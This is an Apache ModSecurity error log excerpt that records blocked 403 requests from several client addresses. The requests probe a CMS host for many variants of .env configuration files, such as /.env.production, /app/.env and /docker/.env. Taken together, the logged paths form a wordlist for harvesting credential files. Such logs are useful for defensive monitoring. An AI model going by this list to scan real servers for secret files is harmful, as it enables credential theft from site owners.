[unique_id "abzEw-WNdVzdR4d4e6ZMywAAARA"] [Fri Mar 20 05:53:39.359536 2026] [:error] [pid 26363:tid 26413] [client 104.23.239.54:11495] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.local"] [unique_id "abzEw94YyF1e-QDujo_qSQAAAVA"] [Fri Mar 20 05:53:39.360170 2026] [:error] [pid 26363:tid 26420] [client 104.23.239.93:14163] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.development"] [unique_id "abzEw94YyF1e-QDujo_qSgAAAVc"] [Fri Mar 20 05:53:39.360480 2026] [:error] [pid 17713:tid 17797] [client 104.23.239.93:14161] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.test"] [unique_id "abzEw-WNdVzdR4d4e6ZMzAAAAQc"] [Fri Mar 20 05:53:39.360572 2026] [:error] [pid 17713:tid 17810] [client 104.23.239.92:12546] [client 104.23.239.92] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.dev"] [unique_id "abzEw-WNdVzdR4d4e6ZMzQAAARQ"] [Fri Mar 20 05:53:39.370559 2026] [:error] [pid 17713:tid 17798] [client 104.23.239.54:11501] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.staging"] [unique_id "abzEw-WNdVzdR4d4e6ZMzgAAAQg"] [Fri Mar 20 05:53:39.371273 2026] [:error] [pid 26363:tid 26408] [client 104.23.239.54:11495] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.backup"] [unique_id "abzEw94YyF1e-QDujo_qSwAAAUs"] [Fri Mar 20 05:53:39.371503 2026] [:error] [pid 17713:tid 17814] [client 104.23.239.92:12552] [client 104.23.239.92] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.bak"] [unique_id "abzEw-WNdVzdR4d4e6ZMzwAAARg"] [Fri Mar 20 05:53:39.371597 2026] [:error] [pid 26363:tid 26400] [client 104.23.239.93:14163] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.old"] [unique_id "abzEw94YyF1e-QDujo_qTAAAAUM"] [Fri Mar 20 05:53:39.371800 2026] [:error] [pid 17713:tid 17792] [client 104.23.239.92:12546] [client 104.23.239.92] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.save"] [unique_id "abzEw-WNdVzdR4d4e6ZM0AAAAQI"] [Fri Mar 20 05:53:39.381712 2026] [:error] [pid 17713:tid 17802] [client 104.23.239.54:11501] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.tmp"] [unique_id "abzEw-WNdVzdR4d4e6ZM0QAAAQw"] [Fri Mar 20 05:53:39.382159 2026] [:error] [pid 26363:tid 26409] [client 104.23.239.54:11495] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.example"] [unique_id "abzEw94YyF1e-QDujo_qTQAAAUw"] [Fri Mar 20 05:53:39.382847 2026] [:error] [pid 17713:tid 17796] [client 104.23.239.93:14161] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.development.local"] [unique_id "abzEw-WNdVzdR4d4e6ZM0gAAAQY"] [Fri Mar 20 05:53:39.392079 2026] [:error] [pid 17713:tid 17807] [client 104.23.239.93:14168] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.production"] [unique_id "abzEw-WNdVzdR4d4e6ZM0wAAARE"] [Fri Mar 20 05:53:39.392607 2026] [:error] [pid 17713:tid 17809] [client 104.23.239.54:11501] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/app/.env"] [unique_id "abzEw-WNdVzdR4d4e6ZM1AAAARM"] [Fri Mar 20 05:53:39.393288 2026] [:error] [pid 17713:tid 17791] [client 104.23.239.92:12552] [client 104.23.239.92] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/backend/.env"] [unique_id "abzEw-WNdVzdR4d4e6ZM1QAAAQE"] [Fri Mar 20 05:53:39.393699 2026] [:error] [pid 26363:tid 26407] [client 104.23.239.54:11495] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/api/.env"] [unique_id "abzEw94YyF1e-QDujo_qTgAAAUo"] [Fri Mar 20 05:53:39.403850 2026] [:error] [pid 17713:tid 17795] [client 104.23.239.54:11501] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/admin/.env"] [unique_id "abzEw-WNdVzdR4d4e6ZM1gAAAQU"] [Fri Mar 20 05:53:39.404345 2026] [:error] [pid 26363:tid 26411] [client 104.23.239.93:14163] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/public/.env"] [unique_id "abzEw94YyF1e-QDujo_qUAAAAU4"] [Fri Mar 20 05:53:39.415497 2026] [:error] [pid 17713:tid 17803] [client 104.23.239.54:11501] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/config/env"] [unique_id "abzEw-WNdVzdR4d4e6ZM2AAAAQ0"] [Fri Mar 20 05:53:39.419865 2026] [:error] [pid 17713:tid 17800] [client 104.23.239.55:13924] [client 104.23.239.55] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/config/.env"] [unique_id "abzEw-WNdVzdR4d4e6ZM2QAAAQo"] [Fri Mar 20 05:53:39.420521 2026] [:error] [pid 26363:tid 26421] [client 104.23.239.54:11502] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.production.local"] [unique_id "abzEw94YyF1e-QDujo_qUQAAAVg"] [Fri Mar 20 05:53:39.426911 2026] [:error] [pid 17713:tid 17799] [client 104.23.239.54:11501] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.php"] [unique_id "abzEw-WNdVzdR4d4e6ZM2gAAAQk"] [Fri Mar 20 05:53:39.431409 2026] [:error] [pid 17713:tid 17808] [client 104.23.239.92:12546] [client 104.23.239.92] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.json"] [unique_id "abzEw-WNdVzdR4d4e6ZM2wAAARI"] [Fri Mar 20 05:53:39.432043 2026] [:error] [pid 17713:tid 17812] [client 104.23.239.93:14161] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env_backup"] [unique_id "abzEw-WNdVzdR4d4e6ZM3AAAARY"] [Fri Mar 20 05:53:39.438225 2026] [:error] [pid 17713:tid 17805] [client 104.23.239.55:13924] [client 104.23.239.55] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env~"] [unique_id "abzEw-WNdVzdR4d4e6ZM3QAAAQ8"] [Fri Mar 20 05:53:39.440727 2026] [:error] [pid 17713:tid 17813] [client 104.23.239.55:13931] [client 104.23.239.55] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/private/.env"] [unique_id "abzEw-WNdVzdR4d4e6ZM3gAAARc"] [Fri Mar 20 05:53:39.442563 2026] [:error] [pid 17713:tid 17793] [client 104.23.239.93:14168] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env1"] [unique_id "abzEw-WNdVzdR4d4e6ZM3wAAAQM"] [Fri Mar 20 05:53:39.443067 2026] [:error] [pid 26363:tid 26417] [client 104.23.239.54:11502] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env2"] [unique_id "abzEw94YyF1e-QDujo_qUgAAAVQ"] [Fri Mar 20 05:53:39.449435 2026] [:error] [pid 17713:tid 17801] [client 104.23.239.54:11501] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.dist"] [unique_id "abzEw-WNdVzdR4d4e6ZM4AAAAQs"] [Fri Mar 20 05:53:39.451947 2026] [:error] [pid 17713:tid 17790] [client 104.23.239.55:13924] [client 104.23.239.55] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.envrc"] [unique_id "abzEw-WNdVzdR4d4e6ZM4QAAAQA"] [Fri Mar 20 05:53:39.453477 2026] [:error] [pid 17713:tid 17806] [client 104.23.239.92:12552] [client 104.23.239.92] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.orig"] [unique_id "abzEw-WNdVzdR4d4e6ZM4gAAARA"] [Fri Mar 20 05:53:39.454393 2026] [:error] [pid 26363:tid 26403] [client 104.23.239.93:14163] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.production.bak"] [unique_id "abzEw94YyF1e-QDujo_qVAAAAUY"] [Fri Mar 20 05:53:39.457523 2026] [:error] [pid 17713:tid 17811] [client 104.23.239.55:13932] [client 104.23.239.55] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/config/.env.local"] [unique_id "abzEw-WNdVzdR4d4e6ZM4wAAARU"] [Fri Mar 20 05:53:39.460848 2026] [:error] [pid 17713:tid 17797] [client 104.23.239.92:12546] [client 104.23.239.92] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.prod"] [unique_id "abzEw-WNdVzdR4d4e6ZM5AAAAQc"] [Fri Mar 20 05:53:39.463371 2026] [:error] [pid 17713:tid 17810] [client 104.23.239.55:13931] [client 104.23.239.55] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.dev.local"] [unique_id "abzEw-WNdVzdR4d4e6ZM5QAAARQ"] [Fri Mar 20 05:53:39.464570 2026] [:error] [pid 26363:tid 26419] [client 104.23.239.54:11502] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.docker"] [unique_id "abzEw94YyF1e-QDujo_qVQAAAVY"] [Fri Mar 20 05:53:39.465627 2026] [:error] [pid 17713:tid 17798] [client 104.23.239.54:11501] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.container"] [unique_id "abzEw-WNdVzdR4d4e6ZM5gAAAQg"] [Fri Mar 20 05:53:39.468749 2026] [:error] [pid 17713:tid 17814] [client 104.23.239.93:14161] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/docker/.env"] [unique_id "abzEw-WNdVzdR4d4e6ZM5wAAARg"] [Fri Mar 20 05:53:39.471543 2026] [:error] [pid 17713:tid 17792] [client 104.23.239.55:13924] [client 104.23.239.55] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/docker-compose.env"] [unique_id "abzEw-WNdVzdR4d4e6ZM6AAAAQI"] [Fri Mar 20 05:53:39.474216 2026] [:error] [pid 17713:tid 17802] [client 104.23.239.93:14168] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/docker/.env.local"] [unique_id "abzEw-WNdVzdR4d4e6ZM6QAAAQw"] [Fri Mar 20 05:53:39.475816 2026] [:error] [pid 17713:tid 17796] [client 104.23.239.92:12552] [client 104.23.239.92] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag 